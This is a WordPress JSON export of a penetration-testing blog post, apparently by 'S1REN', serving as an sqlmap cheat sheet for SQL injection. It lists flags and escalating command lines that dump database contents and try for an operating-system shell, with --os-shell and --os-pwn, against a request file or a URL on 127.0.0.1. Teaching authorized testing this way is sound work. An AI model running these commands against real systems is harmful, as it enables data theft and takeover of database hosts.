{"id":312,"date":"2021-04-27T02:30:29","date_gmt":"2021-04-27T02:30:29","guid":{"rendered":"https:\/\/sirensecurity.io\/blog\/?p=312"},"modified":"2021-07-15T03:02:57","modified_gmt":"2021-07-15T03:02:57","slug":"sqlmap","status":"publish","type":"post","link":"https:\/\/sirensecurity.io\/blog\/sqlmap\/","title":{"rendered":"SQLMap."},"content":{"rendered":"\n
\"\"
\n

S1REN<\/p>\n\n\n\n

Yeah, it's pretty useful.<\/p>\n<\/div><\/div>\n\n\n\n

\"\"

I'm going to preface this with the fact that you will always want to find an endpoint with as many GET and POST parameters in a single query as possible. Being able to iterate through multiple parameters recursively to test for Input Sanitization is extremely powerful during an engagement.

The more the merrier.

S1REN, Will you-<\/em>
Will I cover SQL Injection in a future blog post? <\/em>
Who knows!
Who can say!?<\/em>

[<\/strong> sqlmap ] <\/strong>
https:\/\/tools.kali.org\/vulnerability-analysis\/sqlmap<\/a>

[<\/strong> + ]<\/strong> SQLMAP AND POST DATA: <\/strong>
--> <\/strong>Intercept HTTP POST request in Burp.
--><\/strong> touch request.txt
--><\/strong> nano request.txt
--><\/strong> paste.
--><\/strong> Remove each additional \\r\\n (Carriage Return & Newline Data - usually just an empty space after each header...)
--><\/strong> sqlmap -r request.txt

[<\/strong> + ]<\/strong> Optionally:<\/strong>
--><\/strong> --dbms=mysql (Specify the Database Management System to save a LOT of time with SQLMAP...<\/em>)
--><\/strong> --threads=2 (Specify more threads if you wish - I find two to be fine.<\/em>)
--><\/strong> --time-sec=10 (In the event of time-based SQLi Queries - make the sleep time to 10 seconds...<\/em>)
--><\/strong> --level=2 (Specify the level for SQLMAP - it goes to a maximum of 5 levels.<\/em>)
--><\/strong> --risk=2 (Risk goes up to 3 at max.<\/em>)
--><\/strong> --technique=T (This will specify for any Time-Based versus a value of 'B' which would be \"Boolean Based\" heavy stack queries.<\/em>)
--><\/strong> --force-ssl (Some modern databases themselves require SSL Protocol.<\/em>)
--><\/strong> --dbs (Extract a Database Name<\/em>)
--><\/strong> -D <database name> (Found a Database Name? Tell SQLMap which one you're interested in.<\/em>)

[<\/strong> + ]<\/strong> All Together for request.txt:<\/strong>
sqlmap -r request.txt<\/span>
sqlmap -r request.txt --threads=2
sqlmap -r request.txt --threads=2 --time-sec=10
sqlmap -r request.txt --threads=2 --time-sec=10 --level=2
sqlmap -r request.txt --threads=2 --time-sec=10 --level=2 --risk=2
sqlmap -r request.txt --threads=2 --time-sec=10 --level=2 --risk=2 --force-ssl --force-ssl
sqlmap -r request.txt --threads=2 --time-sec=10 --level=2 --risk=2 --force-ssl --dump
sqlmap -r request.txt --threads=2 --time-sec=10 --level=2 --risk=2 --force-ssl --dump --os-shell
sqlmap -r request.txt --threads=2 --time-sec=10 --level=2 --risk=2 --force-ssl --dump --os-pwn

[<\/strong> + ]<\/strong> On your URL Environment Variable :<\/strong>
sqlmap -u $URL --threads=2 --time-sec=10 --level=2 --risk=2 --technique=T --force-ssl
--><\/strong> or
sqlmap -u $URL --threads=2 --time-sec=10 --level=2 --risk=2 --technique=B --force-ssl

[<\/strong> + ]<\/strong> Need to specify the DMBS?<\/strong>
--dbms=<DBMS>
--dbms=mysql
--dbms=mssql
--><\/strong> etc.

[<\/strong> + ]<\/strong> Dump all data we get please to the terminal please<\/em>.<\/strong>
--dump

[<\/strong> + ]<\/strong> If the DBMS is configured to permit I\/O Operations (<\/strong>Specifically Output<\/em>).<\/strong> - Shell<\/span>
--os-shell

[<\/strong> + ]<\/strong> Specify a specific parameter to Test<\/strong> (i.e. I want to test parameter9 rather than parameters1-8 as I know that's where the injection point is<\/em> already<\/em>).<\/strong>
--><\/strong>export URL=\"http:\/\/127.0.0.1:80\/superDuperCMS.php?p1=DATA&p2=DATA&p3=DATA&p4<\/strong>=INJECTABLE-POINT
sqlmap -u $URL --threads=2 --risk=2 --level=3 --dbms=<DBMS> -p p4<\/strong>


<\/p>\n","protected":false},"excerpt":{"rendered":"

I'm going to preface this with the fact that you will always want to find an endpoint with as many GET and POST parameters in a single query as possible. Being able to iterate through multiple parameters recursively to test for Input Sanitization is extremely powerful during an engagement. The more the merrier. S1REN, Will […]<\/p>\n","protected":false},"author":1,"featured_media":313,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[4,55,53,16],"class_list":["post-312","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-s1ren","tag-s1ren","tag-sql-injection","tag-sqlmap","tag-tool"],"_links":{"self":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts\/312","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/comments?post=312"}],"version-history":[{"count":7,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts\/312\/revisions"}],"predecessor-version":[{"id":414,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts\/312\/revisions\/414"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/media\/313"}],"wp:attachment":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/media?parent=312"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/categories?post=312"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/tags?post=312"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}